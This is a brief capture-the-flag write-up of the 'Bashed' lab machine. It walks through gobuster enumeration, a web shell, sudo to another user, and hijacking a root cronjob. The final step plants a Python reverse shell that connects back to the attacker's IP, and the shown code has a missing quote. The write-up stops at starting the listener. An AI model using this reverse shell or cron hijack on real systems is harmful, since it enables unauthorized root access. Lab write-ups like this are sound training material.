Bashed

Port Scanning, General Enumeration and Access (Nmap, Gobuster)

• Reading/Resources
  • Nmap manual
  • Gobuster

Initial scan showed that the only port available is 80 (HTTP)

Looks like a pretty neat tool, but not a lot to go on.

gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php

/dev?

found the phpbash thing!

---

Privesc (php reverse shell, python, cronjobs)

• Reading/Resources
  • php reverse shell
  • python
  • cronjobs

We can upload files to the /uploads directory in the webroot

Let’s get a real shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Easy enough to switch to scriptmanager

sudo -u scriptmanager /bin/bash

There’s a scripts folder owned by scriptmanager

Interesting, the python script is ours but text file is owned by root?

I see, so the script runs and creates that file.

Moving the old test.txt to test.txt.bak and re-running the script we can see that the new test.txt is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let’s test

It’s back and with root privs!

Let’s give this boring old test.py some fangs.

import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.18,4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")

I created the new test.py on my machine and transferred it over. Started a listener and…